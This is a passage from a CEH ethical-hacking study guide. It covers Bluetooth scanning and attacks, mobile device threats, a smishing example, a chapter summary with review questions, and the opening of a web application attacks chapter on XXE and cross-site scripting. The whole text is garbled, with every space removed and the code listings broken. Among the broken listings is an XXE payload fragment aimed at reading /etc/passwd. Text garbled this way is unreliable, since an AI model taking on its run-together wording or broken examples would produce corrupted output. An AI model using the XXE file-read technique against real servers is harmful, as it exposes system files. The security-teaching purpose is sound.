mechanismstocompleteapairingrequestwiththisversion,outsideofthecompatibilityrequiredtosupportolderdevices.ThefirstwascalledJustWorksbecausethepairingwassupposedtojustworkwithoutanyinteractiononthepartoftheuser.Ifbothendshavethemeanstotakeinput,theycansupportnumericcomparison.Thisiswhereeachendpresentsasix-­digitnumericvalue.Ifthetwovaluesmatch,theusercanindicatethattobethecaseandthetwoendpointscancompletethepairingprocess.Insomecases,aperipheralmayonlybeabletoprovideinputbutnotoutput,suchas,forexample,aBluetoothkeyboard.Whenyoupairthatwithyourcomputer,yourcomputermaypromptyoutoenteravalueonthekeyboard.Ifthevaluesmatch,thepairingprocesscompletes.Again,thiswouldbeasix-­digitvalue.Finally,youcandoanout-­of-­bandpairing.Thiswouldrequireanotherprotocoltoassistinthepairingprocess.Forexample,near-­fieldcommunication(NFC)issometimesused.Youmayhaveadevicethatexpectsyoutobringanotherdevicelikeasmartphoneortabletclose.Oncethetwodevicesareclose,youcanuseanapponthesmartphoneortablettocompletethepairingandsetupprocess.ThereareafewwaystoattackBluetooth.Keepinmindthatnomatterwhatyoudo,youneedtobewithincloseproximityofthedeviceyouwanttoattack.Thiscanbeeasyinpublicplaces,though.Someoftheseattacksarebluejacking,bluesnarfing,andbluebugging.ScanningBeforewegotoofardowntheroadofattacks,weshouldgooverhowyouwoulddeterminewherepotentialvictimsmaybe.YoucouldjustgothroughtheprocessofaddingaBluetoothdevice,andyoursystemwillscanfordevices.However,youcanalsomakeuseofspecial-­purposesoftware.Thiscouldbedoneusingaprogramlikebtscanner.Withbtscanner,youcandobothaninquiryscanandabrute-­forcescan.Withaninquiryscan,yoursystemputsitselfintoaninquiryscanstate.Inthisstate,yourdevicelistensforinquiriesfromotherdevices.Thereare32channels,andyourBluetoothreceiverhastospendtimelisteningoneveryoneofthem.Inthefollowinglisting,youcanseebtscannerperforminganinquiryscan.464 Chapter11  WirelessSecurity■InquiryScanUsingbtscannerTimeAddress│64:1C:B0:94:BA:58│00:9E:C8:93:48:C9│ClkoffClassName│2018/12/2517:58:220x2c420x0c043c(unknown)││2018/12/2517:56:070x38b30x0a0110(unknown)│││││││││││││││││││││││├────────────────────────────────────────────────────────────────────────────┤│enter=select,Q=quit││startinginquiryscan││Founddevice00:9E:C8:93:48:C9││Founddevice64:1C:B0:94:BA:58Theothertypeofscanisabrute-­forcescan.Whereasaninquiryscanhasthereceiverlisteningforinquiry,abrute-­forcescanactivelysendsmessagestodevicestodeterminewhatBluetooth 465theyare.Todothis,itneedsaddressestosendmessagesto.Thistypeofconnectionhappensatlayer2,whichmeanswearetalkingaboutMACaddresses.Inthefollowinglisting,youcanseetheuseofbtscannertoperformabrute-­forcescan.Torunthisscan,youneedtotellbtscannerthestartingaddressandtheendingaddressyouwanttoscan,whichyoucanseebeingaskedfor.YouwouldneedtoprovidethisintheformofaMACaddress.Keepinmindthateachoctethas256 values,sothemoreoctetsoftheaddressyouwanttorunthrough,thelongeryourscanwilltake.btscannerStartingaBrute-­ForceScan┌────────────────────────────────────────────────┐|││Startaddress│││││││└────────────────────────────┘│││││││││││││├────────────────────────────────────────────────────────────────────────┤│││btscanner2.0││keys:h = help,i = inquiryscan,b=bruteforcescan,a=abortscan,s=savesummary,o=se││lectsort,enter=select,Q=quit│Thistypeofscanningwillgetyoulistsofdevices.Itwon’ttellyoutheprofilesthatthedevicessupport.JusthavingthelistofdevicesnearbymaybeenoughtorunsomeoftheattackscommonlyusedagainstBluetoothdevices.BluejackingBluejackingiswhenanattackersendsdatatoaBluetoothdevicewithouthavingtogetthroughthepairingprocess,orperhapsthepairinghappenswithoutthereceiverknowingaboutit.Youcoulduseabluejackingattacktosendanunsolicitedmessagetoavictim.Thismightbeapictureoratextmessage.Thiscouldbeaspoofattack,whereyousendamessagethatappearstobefromsomeoneelseinordertogettherecipienttodosomething.ThisattackusestheObjectExchange(OBEX)protocoltomovethemessageorpicturefromonedevicetoanother.Sincethisisjustaone-­waymessage,aloneitisn’tharmful.Theharmfromthissortofattackcomesfromgettingthedeviceownertodosomethingyouwantthemtodo.Thismaynotbebeneficialforthem,though.466 Chapter11  WirelessSecurity■BluesnarfingBluesnarfingisconsiderablymoredangerousthanbluejacking.Whereasbluejackingissendingdatatoadevice,bluesnarfingisgettingdatafromadevice.Bluetoothdeviceshavetobeexposedtoacertaindegreetoallowotherdevicestobeginapairingprocess.Thisopensupthepossibilityofanotherdevicetakingadvantageofthatlittlewindow.It’sbeenpossibletogainaccesstoadeviceoverBluetoothwithouthavinggonethroughthepairingprocess.Ifanattackercangainaccesstosomeone’ssmartphoneoranotherBluetooth-­enableddevicewithsensitivedataonit,theymaybeabletoextractthatdata.AswithotherBluetoothattacks,theattackerhastobewithincloseproximityofthedevicetheywanttogainaccessto.Thereisavariation,however,calledlong-­distancebluesnarfing,whichcanallowthesamesortofattackfromagreaterdistance.BluebuggingIt’slikelyyou’reawareoftheconcernoflisteningdevicesaroundus.Amazon’sEcho,Google’sHome,andother,similardevicesaregenerallyina“listenallthetime”mode.Abluebuggingattackissomethingsimilarandwasavailablelongbeforewestartedwillinglyinstallingtheseotherdevicesintoourlivingandworkingspaces.AbluebuggingattackusesBluetoothtogainaccesstoaphoneinordertoplaceaphonecall.Oncethephonecallisplaced,theattackerhasaremotelisteningdevice.Theinitialattackhastobedoneincloseproximitytothetarget,butthephonecallwillcontinuetoprovidearemotelisteningpointnomatterwherethevictimandattackerareinrelationshiptooneanother.Bluebuggingis,perhapsfortunatelyorunfortunatelydependingonwhichendyouareon,easilyidentifiedanddefeated.Atleastwhenthephonecallisplaced,it’sobvioustothepersonwhohasthedevice.Alltheyhavetodoislookattheirdevice.Theycanthenhangup.Ofcourse,remediatingthevulnerabilitythatgaveaccesstotheattackertobeginwithisadifferentstory.Bluebuggingattacks,aswellastheothers,areold.Thismeanstheyarelesslikelytobesuccessfulagainstmoderndevices,sincevulnerabilitiesthatcanallowattackerseasyaccesshavegenerallybeenremediatedintheinterveningyearssincetheseattackswereidentified.Thisisnottosaytheyareirrelevant,however.Therearestillolderdevicesinusethatmayallowtheseattackstobesuccessful.MobileDevicesBluetoothattacksareonewaytogainaccesstomobiledevices,andBluetoothisnicebecauseyoudon’tneedtohavephysicalaccess;youjustneedtobeproximaltothevictim.Thisallowsyoutoworkthroughtheairratherthandoingsomethingphysically.GiventheMobileDevices 467ubiquitousnatureofmobiledevices,itwouldmakesensethattheywouldbehigh-­valuetargetsforattackers.Whilemanyattacksrelyonspecificvulnerabilitiesinapplicationsandoperatingsystems,therearesomeattacksthatarecommonacrossmobileplatforms.Becausetheyworkacrossmultipleplatforms,theyaremoreclassesofattacksthanspecificexploits.Therearecurrentlytwopredominantplatformsformobiledevices,thoughthatdoesn’tmeanthereareonlytwoplatforms.It’salsomademorecomplicatedbecauseoneoftheplatformsisAndroid.AndroidissoftwaredevelopedandmanagedbyGoogle,butthehardwarethatrunsAndroidisdevelopedbynumerousmanufacturers.GoogleprovidesthesourcecodeforAndroidtovendors,andeachvendormayimplementitindifferentways,alteringthecodeand/oraddingsoftwareandfeatures.ThismeanstheAndroidplatformissplinteredandfragmented,nottomentionthelargenumberofAndroidversionsthatareinthewild.Androidrunsonsmartphonesandtablets.ThereisalsoaversionofAndroidthatrunsonsmartwearableslikewatches.TheotherplatformthatiscommonisiOS,developedbyApplefortheiPhoneandiPad.iOSisastripped-­downversionofmacOS.TheadvantagetoiOSfromourperspectivehereisthatAppledoesalottodriveuserstothelatestsoftwareversions,includingmakingithardtorunneweroperatingsystemsonolderhardware.ThismeanstherearefarfewerversionsofiOSinthewildthanthereareofAndroid.Therearetwosidestothiscoin.ThereisabetterchancethatiPhone/iPadOSinstallsareclosertobeingup-­to-­date,withfewerknownvulnerabilitiesthanAndroidinstallationsaresubjectto.Oneofthemostdisturbingvectorsforthreatstomobiledevicesisthroughapplications.AndroidcomeswithanapplicationmarketplacecalledtheGooglePlayStore.VendorslikeSamsungmayalsohavetheirownapplicationmarketplacesasanotheroptionforapplicationstobeinstalledonamobiledevice.Therearealsothird-­partyappstoresthatcanbeconfiguredondevices.AllowingthisisasettingontheAndroidplatform.Bydefault,it’sgenerallydisallowed,butuserscanbypassthatprotectioniftheywish.Applehasitsownmarketplace.YoucanseetheAppleAppStoreinFigure 11.10.iOSisnotanopenplatformlikeAndroid.Thereisnowaytoconfigureadditionalmarketplacesorinstallapplicationswithoutbreakingtheoperatingsystem.Thisprocess,commonlycalledjailbreaking,hasbecomenontrivialasApple(andGoogleandSamsung)havefoundwaystofixvulnerabilitiesthatallowedforthejailbreakingtohappen.Userswhomaybeinclinedtojailbreakaphonemayalsobelikelytoinstallillegitimatesoftware.MobileDeviceAttacksThird-­partyapplicationsarethebestwaytogetaccesstomobiledevices.BothGoogleandApplevetapplicationsthataresubmittedtotheirappmarketplaces.Thisisnotaperfectprocess,however.Therehavebeenapplicationsthathavemadeitthroughthisvetting468 Chapter11  WirelessSecurity■FIGURE 11.10 AppleAppStoreMobileDevices 469processinbothmarketplacesthataremaliciousinoneformoranother.Sometimeslegitimatesoftwareevencrosseslines,suchaswhenTrendMicrosoftwarewaspulledbecauseofthedataitwasfoundtobecollecting.Theproblemisevenworsewithapplicationmarketplacesthatdon’tvetsoftware—­meaningrunningthesoftwarethroughtestsandanalysis.Gettingsoftwareintoathird-­partymarketplaceisawaytoinsertspywareandothermalwareontomobiledevices.Manyappsregularlycollectdata,eitherwiththeuser’sawarenessorwithout.Thisdatacanbetransmittedbacktostoragecontrolledbytheapp’sowner.Mostapplicationsuseframeworksprovidedbytheoperatingsystemvendor(e.g.,AppleorGoogle).TheseframeworksmightcommonlybeusedtosenddataoveranHTTPconnection,andtheymayevenforceencryptionofthatconnection.Thereisnoguaranteeofthatencryption,though,whichmeansdatacanbeleakediftheapplicationcollectsdatafromtheuserandthensendsthatdatatoaremotestoragelocation.Thisdataleakageispotentiallyaseriousproblem,anditmightalsobeusedbyanattackertogatherdetailsthatcouldbeusedforotherattacks.Asmentioned,wirelessnetworksaren’talwaysprotected.Theremayberoguenetworksorunencryptednetworks.Thisisanotherplacewheredataleakagecanhappen.Usingtechniquesshownearlierinthischapter,datacanbecollectedoverwirelessnetworks.Thismaybeespeciallyusefulinpublicplaces,wherepeoplearelikelytobeattachedtowirelessnetworksfromtheirmobiledevices.TheymayalsobelikelytobedoingthingslikecheckingenterpriseemailorinteractingoverenterprisecommunicationsplatformslikeMicrosoftTeams,Slack,orHipChat.Someothercommonattacksagainstmobiledevicesarethesameasthoseyouwouldthinkaboutfortraditionaldesktopsystems.Amobiledevicemayhaveadifferentprocessor,andtheoperatingsystemsdoprovidesomeprotectionsforapplicationssotheydon’tinteractwithotherapplicationsonthedevice.Thisisatechniquecalledsandboxing.Phishingattacksarejustaspossibleonmobiledevices.Malwareispossibleonmobiledevices,justasitisondesktopsystems.Malwarecanincludespyware,collectinginformationfromthemobiledevice.Badprogrammingisalwaysanissue.Nomatterhowmuchtestingisperformed,betweenthesoftwarevendorandtheplatformvendor,bugshappen.Insomecases,badencryptionmechanismsmaybeused.Thismayhappenwhenprogrammersthinktherearebetterwaystoencryptthanbystandardmeans.It’scommonlyfeltthatopenlyavailableencryptionisbestbecauseitgetstobeanalyzedandtestedbyalotofpeoplewhoarethebestintheirfields.Anotherpossibilityfrombadprogrammingpracticesisimproperlyhandlingsessiondata.Sessiondataisusedtoprovideinformationaboutthestateoftheapplicationcommunications.Itletstheclientandserverknowwheretheyareintheapplicationflow.Ifsessioninformationisn’thandledproperly,sessionscanbeimpersonated.Theymayalsobereplayed.Thismaybeespeciallypossibleincombinationwithweakencryption.470 Chapter11  WirelessSecurity■Asmoreusersbringtheirowndevicesintotheworkplace,itcanbehardertoprotecttheenterprisebecausenoteveryavenueofattackcanbecloseddownonapersonaldevice.Thecompanyneedstoprotectitsassets,butthesmartphoneisn’tacompanyasset.Thereisaninterestingintersectionhere,whichattackerscantakeadvantageof.Youdon’thavetogoreallyfancywithyourmobiledeviceattacks,though.Youcangoold-­school.Smishingattacks,shortforShortMessageService(SMS)phishing,usetextmessagestoattackusers.Figure 11.11showsanexampleofareal-­lifesmishingmessage.Attackersarereturningtotheseold-­schoolattacks.Youcanseesomeofthehallmarksofthisbeinganattackmessage.Sometimes,youwillseehallmarksofusingthemixedcasehTtPbecauseit’sthoughttobeawayofevadingdetection.Thismessagedoesn’thavethatindicator.Oldintrusiondetectionsystemsdidn’ttakemixedcaseindicatorsintoaccountandwouldmissmaliciousmessagesthatweren’texactlyasyou’dexpect(eitherHTTPorhttp,forinstance).Thisisascaretactic,though,whichisanindicatoritisamaliciousmessage.Especiallywithsomuchnewsaboutvulnerabilities,thiscouldbethetypeofmessagethatwouldlureinsomeonewhowasn’tverysophisticatedtechnically.Thedomainnamehereishighlysuspicious,thoughsometimesyouwillseeURLsthatareevenmoresuspicious.Sometimes,theURLwillincludearawIPaddress.AsmishingmessagereceivedafewmonthsagoincludedaURLwitharawIPaddress.TheURLused82.118.21.203 insteadofadomainnameorafullyqualifieddomainname.Incaseyouarequestioning,though,youcandoasimplelookupofthisIPaddress,orevendomainnamesincaseyouareconcernedaboutthem.Inthiscase,theIPaddressmapstoRussia.Whilethisinandofitselfisn’tsuspicious,itwouldn’tbeasourceofawebsiteT-­Mobilewasusingtogetcustomerstovisitusingatextmessage,whichwasthecompanythetextmessagewaspurportingtocomefrom.ThefollowingwasthehostnamelookupforthisIPaddress,atthetimeofthereceiptofthetextmessage.Intheinterveningmonths,duringeditstothebook,thehostnamehaschanged.Youcanseethenewnameaftertheoriginalname.[email protected]$host82.118.21.203203.21.118.82.in-­addr.arpadomainnamepointerkamal2.bakkali59.pserver.ru.[email protected]$host82.118.21.203203.21.118.82.in-­addr.arpadomainnamepointernebrosika4.isplevel.pro.MobileDevices FIGURE 11.11 SMishingmessagePhotocourtesyofRickRead471472 Chapter11  WirelessSecurity■SummaryWirelessnetworksarecommontoday,especiallyasmobiledevicesbecomemoreubiquitous.Therearetwocommontypesofwirelessnetworks.Thefirstisanadhocnetworkwherethestationsorganizethemselvesintothenetwork.Astationisanendpointinawirelessnetwork.Ifthereisanaccesspointthatthestationsconnectto,it’saninfrastructurenetwork.Whenstationsconnecttoanaccesspoint,theyhavetoauthenticate.Theremaybeopenauthentication,whichmeansanyonecanjointhenetworkwithoutneedingtoknowapassword.ModernwirelessnetworksuseWPAforencryptionandWPAnetworksuseafour-­stagehandshaketoauthenticatethestationandalsoderivetheencryptionkey.WEPwasthefirstattemptatencryptingwirelesscommunications.Unfortunately,theinitializationvector,arandomvaluemeanttoseedtheencryption,wasn’tactuallyrandomandcouldbeguessed,leadingtokeyleakage.Thesecondpasswasmeantasastopgap,andthatwasWPA.Eventually,thefinalreplacementforWEPcameout,calledWPA2.WPAandWPA2supportbothpersonalandEnterpriseauthentication.Personalauthenticationusesapre-­sharedkey.Enterpriseauthenticationcansupportusernameandpasswordauthentication.WPA3 wasintroducedin2018,whichincludedtheuseofstrongerencryptionkeysaswellastheuseofSimultaneousAuthenticationofEqualstobetterprotectthetransmissionsbetweenthestationandaccesspoint.Wirelessnetworkscanbeattacked.InnetworksthatuseWEP,theencryptionkeycouldbederivedifenoughframeswerecollectedfromthewirelessnetwork.CommonsniffingapplicationslikeWiresharkcanbeusedtosniffwirelessnetworks.Thewirelessinterfaceneedstobeputintomonitormodetocollecttheradioheaders.Wiresharkmaybecapableofdoingthisonitsown,dependingonthenetworkinterface.Youcanalsousetheairmonprogramfromtheaircrack-­ngsuite.Youcanalsouseaircrack-­ngtotrytocrackthepasswordusedforthenetwork.Onewaytogatherenoughdataistouseadeauthenticationattack.Thisattacksendsmessagestoclientstellingthemtheyhavebeendeauthorizedonthenetwork.Theattackingsystemspoofsthemessagestoappearasthoughtheyarecomingfromtheaccesspoint.Simultaneously,theattackermayattempttojamtheaccesspointsoitdoesn’tgetand,moreimportant,respondtothestation.Theattackermaycontinuouslysendthesedisassociationmessagestoforcethevictimstationtokeepsendingmessagestryingtoauthenticateagainstthenetwork.EviltwinattacksarewheretheattackerestablishesanetworkthatappearstobealegitimatenetworkwiththesameSSID.Stationswouldattempttoauthenticateagainsttherogueaccesspoint.Therogueaccesspointcouldthencollectanyauthenticationcredentials,andoncethestationhadpassedthosealong,theeviltwinwouldallowtheconnection,gatheringtrafficfromthestationoncethestationwasconnected.Anotherattackisthekeyreinstallationattack.Thisisanattackwheretrafficisreusedtoforceastationtouseakeythat’salreadyknown.Thismeanstheattackerknowswhatthekeyis,meaningtrafficcanbedecrypted.Summary 473Ofcourse,802.11isnottheonlywirelesscommunicationsprotocol.Bluetoothisoftenused.ThereareseveralBluetoothattacks,thoughsomeofthemmaybeoutdatedandwon’tworkonmoderndevices.ButthereareplentyoflegacydevicesthatuseolderBluetoothimplementationswheretheseattackscanwork.BluejackingisusingBluetoothtosendamessagetoatargetsystem.BluesnarfingiscollectingdatafromatargetsystemusingBluetooth.BluebuggingisusingBluetoothtoconnecttoatargetsystemandtheninitiatingacalloutfromthetargetsystemsoconversationscanbebugged.Mobiledevicescommonlyusewirelessprotocolslike802.11andBluetooth.Therearewaystoinjectmaliciousapplicationsontomobiledevicesliketabletsandsmartphones.Thismaybedoneusingathird-­partyappstorethatusersmaybeconvincedtoaddasanoptiontotheirdevice.Mobiledevicesarealsovulnerabletothesamesortsofattacksasdesktops,suchasphishing,malware,andprogrammingerrorsthatcanopenthedoorfordataleakage.474 Chapter11  WirelessSecurity■ReviewQuestionsYoucanfindtheanswersintheappendix.1.Whatarethetwotypesofwirelessnetworks?A.StarandringB.BusandhybridC.InfrastructureandhybridD.Infrastructureandadhoc2.HowmanystagesareusedintheWPAhandshake?A.TwoB.FourC.ThreeD.One3.Whatmodehastobeenabledonanetworkinterfacetoallowallheadersinwirelesstraffictobecaptured?A.PromiscuousB.MonitorC.RadioD.WirelessLAN4.Whatwirelessattackwouldyouusetotakeaknownpieceofinformationtobeabletodecryptwirelesstraffic?A.SniffingB.DeauthenticationC.KeyreinstallationD.Eviltwin5.WhatisthepurposeofperformingaBluetoothscan?A.IdentifyingopenportsB.IdentifyingavailableprofilesC.IdentifyingendpointsD.Identifyingvendors6.Whatisthepurposeofadeauthenticationattack?A.DisablingstationsB.ForcingstationstoreauthenticateC.ReducingthenumberofstepsinthehandshakeD.DowngradingencryptionReviewQuestions 7.Whatisthepolicythatallowspeopletousetheirownsmartphonesontheenterprisenetwork?A.BringyourowndeviceB.UseyourowndeviceC.BringyourownsmartdeviceD.Useyourownsmartdevice8.WhatpartoftheencryptionprocesswasweakinWEP?A.KeyingB.Diffie-­HellmanC.InitializationvectorD.Seedingvector9.Whatisthefour-­stagehandshakeusedfor?A.PassingkeysB.DerivingkeysC.EncryptingmessagesD.Initializationseeding10.WhatistheSSIDusedfor?A.EncryptingmessagesB.ProvidingaMACaddressC.IdentifyinganetworkD.Seedingakey11.Whatkindofaccesspointisbeingusedinaneviltwinattack?A.InfrastructureB.AdhocC.WPAD.Rogue12.Howdoesaneviltwinattackwork?A.PhishingusersforcredentialsB.SpoofinganSSIDC.ChanginganSSIDD.Injectingfour-­wayhandshakes475476 Chapter11  WirelessSecurity■13.Whatmethodmightyouusetosuccessfullygetmalwareontoamobiledevice?A.UsingtheAppleStoreorGooglePlaystoreB.UsingexternalstorageonanAndroidC.Usingathird-­partyappstoreD.Jailbreaking14.Whatwouldyouuseabluebuggingattackfor?A.IdentifyingBluetoothdevicesnearbyB.ListeningtoaphysicalspaceC.Enablingaphone’scameraD.Gatheringdatafromatargetsystem15.WhatwouldasignalrangeforaBluetoothdevicecommonlybe?A.300ft.B.3,000ft.C.75ft.D.500ft.16.Whattoolcouldyouusetoenablesniffingonyourwirelessnetworktoacquireallheaders?A.EttercapB.tcpdumpC.aircrack-­ngD.airmon-­ng17.Whyisbluesnarfingpotentiallymoredangerousthanbluejackingfromthestandpointofthevictim?A.Bluejackingsendswhilebluesnarfingreceives.B.Bluejackingreceiveswhilebluesnarfingsends.C.Bluejackinginstallskeyloggers.D.Bluesnarfinginstallskeyloggers.18.Whattoolwouldallowyoutorunaneviltwinattack?A.WiresharkB.EttercapC.wifiphisherD.aircrack-­ngReviewQuestions 19.WhattypesofauthenticationareallowedinaWPA-­encryptednetwork?A.HandshakeandpersonalB.PersonalandenterpriseC.EnterpriseandhandshakeD.802.11andpersonal20.Whatwouldn’tyouseewhenyoucapturewirelesstrafficthatincludesradioheaders?A.CapabilitiesB.ProberequestsC.SSIDsD.Networktype477Chapter12Attackand DefenseTHEFOLLOWINGCEHTOPICSARECOVEREDINTHISCHAPTER:✓✓Firewalls✓✓Networksecurity✓✓Boundaryprotectionappliances✓✓Loganalysistools✓✓Securitymodels✓✓Informationsecurityincidents✓✓TechnicalassessmentmethodsAttackingisanimportantelementofanethicalhackingengagement.Onceyou’vegottenthroughallofyourevaluationoftheenvironment,youcanmoveintotryingtogainaccesstoit.Whilesocialengineeringcanbeanimportantelementinanattack,it’snottheonlywayin.Onceyougetinside,youwillalsowanttoworkonmovinglaterally.Thiscanrequiresometechnicalattacks.Itmayinvolveengagingwithwebapplicationsandthedifferentvulnerabilitiesthatmaybeexposedthere.Youmayalsoneedtoknowaboutdenial-­of-­serviceattacks.Itmaybenecessarytotakeoutaserverwhileyouareperformingspoofingattacks.Therearealsoapplication-­levelcompromisesoflisteningservices.Anotherelementtoconsiderwhileyouareattackinganetworkiswhatdefensesareinplace.Sincetheprimaryobjectiveofethicalhackingistoimprovethedefensivepostureofanorganization,it’shelpfultounderstanddefensivestrategies.Ontheattackside,knowingwhatmaybeinplacewillhelpyoucircumventthedefenses.Whenyouareprovidingremediationstotheorganizationyouareworkingwith,youshouldhaveabetterunderstandingofwhatmightbedone.Webapplicationsareacommonwayforuserstogetaccesstofunctionsanddatafrombusinesses.Thereareseveralwaystoattackwebapplications.Attackingawebapplicationsuccessfullymayhavemultiplepotentialoutcomes,includinggettingsystem-­levelaccess.Websitesarealsotargetsofdenial-­of-­serviceattackssometimes.Whilebandwidthconsumptionattacksmaycometomindwhenyouthinkofdenialofservice,it’snottheonlytypeofdenial-­of-­serviceattack.Therearesomewaystoperformdenial-­of-­serviceattacksthatremaineffectiveandhavenothingtodowithbandwidthconsumption.Attackerswillusuallytrytomovefromsystemtosystem—­aprocesswecalllateralmovement.Becauseofthis,andbecauseaneasyavenueisoftenthroughalreadyopenholes,it’simportanttohaveagooddefensivestrategy.Whiledefenseindepthanddefenseinbreadthhavelongbeenthoughttobegoodapproachestoprotectingthenetwork,anotherwaytothinkaboutthenetworkdesignisimplementingadefensiblenetworkarchitecture.WebApplicationAttacksWebapplicationsaremorethanjustasetofwebpages.It’spossibletohaveastaticsitewhereusershavenoprogrammaticinteractionwiththepages.Pagesarepresentedtotheuserandtheremaybelinksandothercontent,butthereisnoplacetoenteranythingintothepageorotherwisesendsomethingtotheserverthatmaybeactedon.Awebapplicationmayhavecodewithinthepage,usingascriptinglanguage,orcodethatrunsontheserver.WebApplicationAttacks 481Onewaytothinkaboutawebapplicationisfromthearchitecturestandpoint.Acommonwaytodevelopanapplicationisthoughttobethroughtheuseofthemodel/view/controllerpattern.Figure 12.1showsadiagramofhowthemodel/view/controllerpatternwouldbeimplementedthroughawebapplication.Themodelisthestructureofthedata.Whileitisoftenstoredinadatabase,thereisoftenanapplicationserverthatmanagesthemodelbycreatingthestructureandactingonit.Theapplicationserverusesthedatabaseserverforpersistentstorage,butallhandlingofthedata(themodel)isdoneintheapplicationserver.Thismeansalldatamanipulationisinitiatedintheapplicationserver,thoughexecutionofthelogicmaysometimeshappenonthedatabaseserver.KeepinmindthatinteractionwithadatabaseisdonethroughtheuseofStructuredQueryLanguage(SQL).Whilethebusinessandapplicationlogichappensintheapplicationserver,sometimesthemanipulationisactuallydoneonthedatabaseserver.FIGURE 12.1 Model/view/controllerdesignApplicationServerModelControllerViewWebServerDatabaseThecontrolleristhepartoftheapplicationthatreceivesrequestsandhandlesthem,vectoringtherequesttothecorrectpartoftheapplicationrunningintheapplicationserver.Finally,theviewistheuserinteractioncomponent,generallyawebbrowser.Themodelispresentedinawaythatisconsumablebyauserinthebrowser.ThereiscodeintheformofHypertextMarkupLanguage(HTML)usedtodescribeandrenderthepages.Theremayalsobescriptsthathelpwiththefunctionofthepageinthebrowser.Theapplicationserverhandlesthebusinesslogicoftheapplicationandmayusedifferentprogramminglanguages,dependingonthetypeofapplicationserver.OnWindows,someonemaybeusingMicrosoft’sInternetInformationServices,whichwouldhaveanapplicationserversupporting.NETlanguageslikeC#andVisualBasic.Javaapplicationsareavailablefrommanyvendors.Tomcat,WildFly(formerlyJBoss),WebLogic,andmanyothersaretypesofJavaapplicationservers.Theapplicationserveritselfmayintroducedifferentvulnerabilitiesandmethodsofattack,buttherearealsomanygenericattackscommonacrosswebapplications.Oneimportantconsiderationwhenyouarelookingatwebapplicationattacks,however,iswhichcomponentisbeingattacked.Someattacksmaybeaimedattheclientdevice(the482 Chapter12  Attackand Defense■view),whileothersmaybetargetingthewebserver(thecontroller).Othersmaybeafterthedatastorageelement(thedatabase).Thepointofattack,though,isnotalwayswhereyouwouldremediatetheattack.Thismeansthatevenif,forexample,theclientwasthetargetofanattack,theclientmaynotbethebestplacetoprotectagainsttheattackhappening.XMLExternalEntityProcessingAdatamodelmaybeacomplexsetofdatawheremultiplepiecesofdataarerelatedandneedtobeorganizedtogether.Thisisverydifferentthanjustpassingastringfromawebpagetoawebserver.Itmaybepassingmultiplestrings,afewintegers,andalsosomeorganizinginformation.OnewayoforganizingthedataistousetheExtensibleMarkupLanguage(XML).XMLallowsyoutoputallrelateddatatogetherintoasingledatastructure,completewiththeorganizinginformationindicatingwhateachpieceis.AcommonwaytopassdatabackandforthbetweenaclientandaserveristouseXMLtostructurethedataandtransmitthatXML.Asyouwillseewithotherwebapplicationattacktypes,anXMLentityinjectionattackcomesfromcodeonthewebserveracceptingdatathatcomesfromtheclientwithoutdoinganydatavalidation.Thismeansprogrammershavenotwrittenanysortofcheckonthedatawhenitenterstheapplication.Evenifit’sscriptcodeinthepagecontentsthatisrenderingthedata,it’sstillpossibleforausertotamperwithitorevengenerateadatatransmissiontosendtotheserver.Asaresult,anydatacomingfromtheusershouldneverbetrusted.Asageneralrule,datapassedintoafunctionfromtheoutsideshouldnotbetrustedbecausethereisnoguaranteethenormalcontrolflowoftheprogramhasn’tbeentamperedwith.Whenprogrammersdon’tdoanycheckingofthedata,baddatacanslipintotheprogramandaltertheexpectedbehavior.AnexampleofanXMLpackagethatcouldallowtheattackertogainaccesstosystemfilesisshowninthefollowingcodelisting.TheXMLreferstoanexternalentityfromthesystem.Inthiscase,it’safile.Theattackerisrequestingthatthecontentsofthefile/etc/passwdbedeliveredbacktotheview.XMLExternalEntityProcessingExample]>&xxe;Thismaynotnecessarilyseemlikeabigdeal.However,insomecases,youcangettheapplicationservertodosomeofyourworkforyou.Let’ssayyouwanttoknowwhetheraninternalwebserver(e.g.,oneyou,astheattacker,can’taccessbecauseoffirewallrules)isrunning.OnewayofdoingthisistohavetheapplicationserverinitiatearequestbypassingaURLintothesystemtag.ThiswouldhavetheapplicationservermakeacalltothesystemwithaURL,whichthesystemwouldinterpretasarequesttopullthepageindicated.HereyoucanseeanexampleofXMLthatwouldallowthistohappen.WebApplicationAttacks 483XMLRequestfor InternalPageOfcourse,doingthissortofresourcechecking,orportscanningifyouwill,isnottheonlythingyoucandowiththisapproach.Thebestwaytopreventagainstthissortofattackistodoinputvalidation.Inputvalidationshouldbedoneontheserverside.Youcandoinputvalidationontheclientside,butexpectthatitwillbebypassed.It’seasyenoughtouseaninterceptingproxyorevenanin-­browsertooltocapturerequestsandmodifythembeforesendingthemofftotheserver.Inexamplessuchasthis,simplynotallowinganyXMLtousetheexternalentitySYSTEMisastarttowardprotectingagainstthisattackbeingsuccessful.Anyactiontheapplicationhastoperformthroughthesystemshouldbedonedirectlybytheapplicationafterithasparsedthedata.Goingastepfurther,evaluatingifthereisawayaroundtheuseofanyexternalentitywouldbeuseful.Again,anyexternalneedshouldprobablybehandleddirectlybytheapplicationcodeafterithasproperlyevaluatedanydata.ThismeansalltheexternalentitiescouldbeignoredwhenparsingtheXML.AnexternalentityXMLattacktargetstheserver.Thiscouldbethewebserverortheapplicationserver,dependingonwhohandlesparsingtheXML.Cross-­SiteScriptingAcross-­sitescripting(XSS)attackisonethatusesthewebservertoattacktheclientside.Thisinjectsacodefragmentfromascriptinglanguageintoaninputfieldtohavethatcodeexecutedwithinthebrowserofauservisitingasite.Therearethreewaystorunacross-­sitescriptingattack.Theyalltargettheuser.Thedifferenceiswhetherthescriptisstoredsomewhereornot.Thefirsttype,storedontheserveranddisplayedforanyuservisitingapage,iscalledpersistentcross-­sitescripting.Thesecondiscalledreflectedcross-­sitescripting.ThelastmakesuseoftheDocumentObjectModel(DOM).You’llnotethatcross-­sitescriptingisabbreviatedXSS,wheretheXisacross,ratherthanCSS,wheretheCisthefirstletterincross.Thereisanotherwebtechnology,CascadingStyleSheets,thatisabbreviatedCSS,whichcouldeasilybecomeconfusingiftheywerebothCSS.Allthreetypesmakeuseofascriptinglanguageinthesameway.Theattackerwoulduseashortscriptinsideablock.Forexample,theattackermayinjectintoaninputfield.Withpersistentcross-­sitescripting,thiswouldbeafieldwherethevalueisstoredontheserver.Aclassicexampleofthissortofattackisawebforumwhereausermaybeaskedforaname,anemailaddress,andthenacomment.Allofthevaluesfromthesefieldsinthewebformwouldbestored.Whensomeonecamebacktotheforum,theinformationwouldbedisplayed,includingthe484 Chapter12  Attackand 